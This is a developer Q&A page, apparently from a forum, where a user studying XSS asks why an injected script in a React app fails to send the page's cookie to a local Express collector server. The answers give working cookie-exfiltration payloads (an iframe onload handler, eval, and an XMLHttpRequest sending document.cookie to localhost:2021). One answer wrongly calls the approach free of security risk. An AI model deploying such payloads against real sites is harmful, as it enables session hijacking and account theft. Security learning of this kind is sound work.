What could be the reason for this XSS script not making a request to my server?

Currently diving into the realm of XSS attacks to enhance my knowledge on application security. My goal is to extract the user's cookie from a local website and then transmit it to my local server for testing purposes.

I've successfully obtained the cookie using an alert message, but encountering difficulties when attempting to execute an API call. Here is the code snippet I suspect may be causing the issue:

Code in React app:

<p dangerouslySetInnerHTML={{
      __html: `<script type="text/javascript">
               document.location='http://localhost:2021/xss?user='+document.cookie;
               </script>`,
    }}
    />

Server-side code:

const app = require("express")();
    const cors = require("cors");
    app.use(cors());
    
    app.get("/xss", (req, res) => {
    const {user} = req.query
      res.send("it works", user);
    });
    
    app.listen(2021, () =>
      console.log("Server is waiting to read yummy cookies")
    );

The specified route "/xss" does not seem to trigger any action as expected.

javascriptxss

Answer №1

Manipulating innerHTML will not trigger script execution.

document.getElementById("container").innerHTML=`<script>alert("hi")<\/script>Nothing occurs`
<div id="container"></div>

Consider using this alternative method instead:

<div dangerouslySetInnerHTML={{
  __html: `<iframe onload="document.location='http://localhost:2021/xss?user='+document.cookie;"></iframe>`,
}}
/>

Answer №2

I'm not sure what your goal is, but creating a script tag like that is not the best solution. The issue here is that the JavaScript code isn't being executed because it's being treated as plain text within the script tag. If you want to execute JavaScript from a string, you could use the eval function (although I would advise against it due to security risks). Here's an example of how you could do this:

const script = `document.location='http://localhost:2021/xss?user='+document.cookie;`;
eval(script);

However, I must emphasize again: do not do this!!!

Instead, consider serving the JavaScript file from a server and using the src attribute to load it.

If you simply need to make an HTTP request, you can use XHR. More information on this topic can be found here. In short:

const xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:2021/xss?user=' + document.cookie);
xhr.send();

This approach should work without introducing any security risks.

Similar questions

If you have not found the answer to your question or you are interested in this topic, then look at other similar questions below or use the search

Why are there red squiggly lines appearing on properly written JavaScript code in Visual Studio Code?

Recently, I've been encountering a frustrating issue with irritating red squiggly lines appearing under my import statement. Despite the fact that the code functions perfectly and everything operates as anticipated, these lines continue to bother me. ...

javascriptvisual-studio-code

Issue with Vue's v-autocomplete component not clearing the user's typed text when an item is selected from

I have implemented a vue v-autocomplete component on my page. I am unsure if the current behavior is as expected, as I cannot find similar examples demonstrating this functionality. The issue arises when a user begins typing in text and the autocomplete ...

javascripthtmlvue.jsautocompletev-autocomplete

Is there a way for me to immediately send data after receiving it?

When I try to perform onPress={() => kakaoLosing() I am attempting to retrieve data (profile) from getProfile using async await and immediately dispatch that data to KAKAOLOG_IN_REQUEST, This is my current code snippet: import { ...

javascriptnode.jsreactjsreact-native

Utilizing Angular to apply multiple ng-repeat directives with multiple filters

I am working on a project that involves multiple ng-repeat lists with several filters. Currently, I am using (ex:A.value) if (ex:B.value), but I would like to implement multiple filters. The filters I want to incorporate are recommend_search, skill_searc ...

javascriptjqueryhtmlangularjs

Animated SVG Arrow Design

I created a dynamic SVG animation that grows as you hover over it. Since I'm still learning about SVG animations, I encountered some issues with my implementation. The animation is quite straightforward - when hovering over the SVG arrow, the line sho ...

javascriptcssreactjssvggatsby

Utilize a class method within the .map function in ReactJS

In my ReactJS file below: import React, { Component } from "react"; import Topic from "./Topic"; import $ from "jquery"; import { library } from '@fortawesome/fontawesome-svg-core' import { FontAwesomeIcon } from '@fortawesome/react-fontaw ...

javascriptreactjsfrontend

The element is implicitly assigned an 'any' type due to the fact that an expression of type 'any' cannot be used to index types in nodejs and solidity

I am in need of setting networks in my contract using NodeJS and TypeScript. Below is the code I have written: let networkId: any = await global.web3.eth.net.getId(); let tetherData = await Tether.networks[networkId]; Unfortunately, I encountered ...

javascriptnode.jstypescriptsolidity

Generate CANNON.RigidBody using either a THREE.Mesh or THREE.Geometry object

For my project, I am using a THREE.JSONLoader to create a THREE.Mesh object as shown below: // Creating a castle. loader.load('/Meshes/CastleTower.js', function(geometry, materials) { var tmp_material = new THREE.MeshLambertMaterial(); T ...

javascriptthree.jscannon.js

What could be the reason that the painting application is not functioning properly on mobile devices?

I am facing an issue with my painting app where it works perfectly on desktop browsers but fails to function on mobile devices. I tried adding event listeners for mobile events, which are understood by mobile devices, but unfortunately, that did not solve ...

javascripthtmlcss

Enhancing the appearance of the content editor with a personalized touch

I am working with a standard content editor that utilizes an iFrame as the text area. Upon changing dropdown options, it triggers the following command: idContent.document.execCommand(cmd,"",opt); Where "idContent" refers to the iFrame. One of the dropd ...

javascripthtmlcsscontent-management

The deployment on Vercel is encountering an issue because it cannot find the React Icons module, even though it has been successfully installed

My attempt to deploy a project on Vercel is encountering an error during the building phase. The error message states that React icons cannot be found, even though they are installed in the package.json file and imported correctly in the component using th ...

javascriptreactjsnext.jsvercelreact-icons

Issue encountered when attempting to develop a countdown timer using Typescript

I am currently working on a countdown timer using Typescript that includes setting an alarm. I have managed to receive input from the time attribute, converted it using .getTime(), subtracted the current .getTime(), and displayed the result in the consol ...

javascripthtmltypescript

Plotting Data Points with Tags in React Native

After doing some research, I came across a few React Native packages that offer scatter plots such as react-native-scatter-chart, react-native-chart-kit, and react-native-chartjs. However, I am interested in finding something more customizable. I'm s ...

javascriptreactjsreact-nativeplotscatter-plot

Stuck on loading screen with Angular 2 Testing App

Currently working on creating a test app for Angular 2, but encountering an issue where my application is continuously stuck on the "Loading..." screen. Below are the various files involved: app.component.ts: import {Component} from '@angular/core& ...

javascriptangularjsnode.jstypescriptangular

Error: FullCalendar does not display a header for the timeGridWeek view when the dates fall

Currently, I am integrating fullcalendar 5.5.0 with Angular 10. After migrating from fullcalendar v4 to v5, I noticed an annoying issue where the header for the date before the validRange start is no longer displayed: These are the parameters being used: ...

javascriptangularfullcalendarfullcalendar-5

Guide to Re-rendering a component inside the +layout.svelte

Can you provide guidance on how to update a component in +layout.svelte whenever the userType changes? I would like to toggle between a login and logout state in my navbar, where the state is dependent on currentUserType. I have a store for currentUserTyp ...

javascripthtmlcsstypescriptsvelte

Navigating the authorization header of an API request in a Node environment

const authHeader = req.headers["authorization"]; I have a question that may come across as basic - why do we use ["authorization"] instead of just .authorization? After some research, I discovered it had to do with case sensitivity but ...

javascriptnode.jsexpressauthenticationtoken

How can I populate a form in Meteor with data from a MongoDB collection that was previously inserted?

Recently, I completed constructing a lengthy form field where users can enter a plethora of information. This form consists of various text and number fields, radio button sets, and checkbox groups. The data is successfully saved in a Mongo collection with ...

javascriptformsmongodbmeteor

The EJS file is failing to display the stylesheet even though it is being pulled from the

Encountering a strange issue where the page routed to display additional information about a specific record from my database list on the homepage is not loading the stylesheets located in my partial/head, despite successfully passing the object informatio ...

javascriptnode.jsexpressejs

There appears to be an issue with the functionality of the JavaScript calculation function

Check out this JS Fiddle. I've tried my best in writing the script, but it just doesn't seem to work properly. If you could spare some time to review it and provide feedback on what I might be missing or doing wrong, I would greatly appreciate it ...

javascriptfunctionjsfiddle